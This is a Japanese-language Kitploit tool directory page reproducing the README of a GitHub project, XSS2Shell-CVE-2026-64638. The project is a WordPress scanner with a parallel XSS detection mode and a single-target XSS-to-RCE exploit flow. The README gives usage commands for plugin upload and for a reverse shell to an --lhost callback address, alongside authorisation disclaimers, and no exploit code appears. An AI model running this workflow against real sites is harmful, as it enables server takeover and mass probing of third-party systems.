Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
偵察ウェブ脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

WordPressセキュリティスキャナ。バージョンのフィンガープリンティング、複数ターゲットに対するリフレクテッドXSSの並行検出、および許可されたテストのための認証済みXSS-to-RCEエクスプロイトワークフローをサポートします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
171ヶ月前未レビュー

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

2026年バグハンティング手法

XSS2Shell Multi-Target Scanner

開発者: クレジット: YogaGymn

WordPress の許可されたセキュリティテストのための PoC/スキャニングユーティリティ。このプロジェクトには、単一ターゲット用のエクスプロイトフローと、スキャンのみの並行マルチターゲットモードが含まれています。

重要: このプロジェクトは、所有している WordPress インストール、または明示的なテスト許可を得ている WordPress インストールに対してのみ使用してください。マルチターゲットスキャナは、バージョン識別と XSS リフレクション検出のみに意図的に制限されています。ターゲットリストに対する資格情報の取得、プラグインのアップロード、RCE は実行しません。

機能

単一ターゲットモード

元のスクリプトは以下をサポートしています:

  • WordPress バージョンの識別。
  • XSS リフレクションの検出。
  • auto、xss、direct モード。
  • WordPress への直接認証とプラグインのアップロードのフロー。
  • 元の PoC に含まれる XSS チェーン機能。
  • 元の PoC に含まれるオプションのコールバック/リバースシェル機能。

マルチターゲットモード

追加されたスキャナは以下をサポートしています:

  • テキストファイルからのターゲットの読み込み。
  • 重複ターゲットの削除。
  • ThreadPoolExecutor による並行スキャン。
  • 設定可能なワーカー数。
  • WordPress バージョンの検出。
  • XSS リフレクションの検出。
  • 進捗レポート。
  • 入力ファイルと同じ順序で保存される結果。
  • 要約統計。

マルチターゲットモードは、元の RCE 関数を呼び出しません。

要件

  • Python 3.9+
  • requests

依存関係をインストール:

root@kitploit:~
python3 -m pip install requests

Linux ディストリビューションが外部管理の Python 環境を使用している場合は、仮想環境を使用してください:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

インストール

プロジェクトをクローンまたはコピーします: yogaGymn による元のエクスプロイト

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

または、単に次のファイルを配置します:

root@kitploit:~
xss2shell.py

作業ディレクトリ内に配置します。

マルチターゲットスキャナ

targets.txt OU alvos.txt というファイルを作成します:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

コメント行と空行は無視されます:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

スキャナを実行:

root@kitploit:~
python3 xss2shell.py -i targets.txt

デフォルトの並行度は 10 ワーカーです。

並行度の変更

たとえば、20 ワーカーを使用する場合:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

小規模なラボの場合:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

必要以上に多い ワーカー 数を選択しないでください。接続負荷が増加し、レート制限や防御コントロールが作動する可能性があります。

出力ファイルの変更

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

出力例

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

結果の形式

デフォルトの scan_results.txt はタブ区切りのフィールドを使用します:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

例:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS ステータス値


ステータス 意味


XSS_REFLECTION_DETECTED スキャナは、テストした HTML リフレク ション動作を検出しました。これは、それ 自体が RCE の証明になるわけではありま せん。

XSS_NOT_DETECTED テストしたリフレクションは検出されま せんでした。

ERROR チェック中に例外が発生しました。

XSS の詳細値

スキャナは次のような詳細を報告できます:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

これらの値は、検出ルーチンによって観測された応答を表します。結果を確認済みの脆弱性と見なす前に、手動で検証する必要があります。

単一ターゲットでの使用

元のスクリプトは単一ターゲット引数もサポートしています。

自動モード

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

直接モード

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS モード

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

XSS/直接ワークフローは、コマンド実行機能を含むプラグインを作成または有効化する可能性があります。許可されたテスト環境でのみ使用してください。

CLI リファレンス

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

引数


引数 説明


target 単一ターゲットの URL。

-i, --input 複数のターゲットを含むファイル。

--output マルチターゲット結果の出力ファイ ル。デフォルト: scan_results.txt。

--workers 並行ワーカー数。デフォルト: 10。

--mode 元の単一ターゲットモード: auto、 xss、または direct。

-u, --username 元の直接/フォールバックワークフ ロー用の WordPress ユーザー名。

-p, --password 元の直接/フォールバックワークフ ロー用の WordPress パスワード。

--lhost 元の PoC 用のコールバック/リバー スシェルホスト。

--lport リバースシェルポート。デフォルト: 4444。

--slug プラグインスラッグ。デフォルト: xss2shell。

--callback-port コールバックサーバーポート。デフォ ルト: 9090。

--no-rev 元のワークフローでリバースシェルの トリガーをスキップします。

並行スキャンの仕組み

マルチターゲットモードは、Python の次の機能を使用します:

root@kitploit:~
ThreadPoolExecutor

各ターゲットは独立したスキャンタスクとして送信されます:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

結果はタスクの完了とともに収集され、最終出力はターゲットの元の順序に従って生成されます。

スコープとセキュリティ

マルチターゲットモードは、許可されたセキュリティ評価とラボ環境向けに設計されています。

推奨ワークフロー:

  1. 書面による許可を取得します。
  2. targets.txt ファイルには許可されたドメイン/IP のみを含めます。
  3. 少ない ワーカー(実行プロセス)数から始めます。
  4. スキャナの出力を分析します。
  5. 関連する発見事項を手動で検証します。
  6. 証拠と是正措置を文書化します。

許可なく第三者システムに対してスキャナを使用しないでください。

制限事項

スキャナは完全な脆弱性評価ツールではありません。

特に:

  • 検出された HTML リフレクションは、悪用可能な XSS 脆弱性の存在を自動的に証明するものではありません。
  • 公開 エンドポイント から取得した WordPress バージョンは、欠落または不正確な場合があります。
  • unknown(不明)ステータスは、ターゲットが脆弱であることを意味しません。
  • ネットワークエラーにより不完全な結果が生じる可能性があります。
  • WAF/CDN の動作が検出に影響を与える可能性があります。
  • スキャナはマルチターゲットモードでは悪用可能性や RCE の可能性を判定しません。
  • 脆弱性を報告する前に、結果を手動で検証する必要があります。

プロジェクト構造

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

ライセンス

提供されたソースコードにはライセンス情報がありませんでした。

このプロジェクトを公開する場合は、LICENSE などの明示的なライセンスファイルを追加してください。このコードは、ZSecurity の元のコードをさらに発展させたものです。

ツールをダウンロード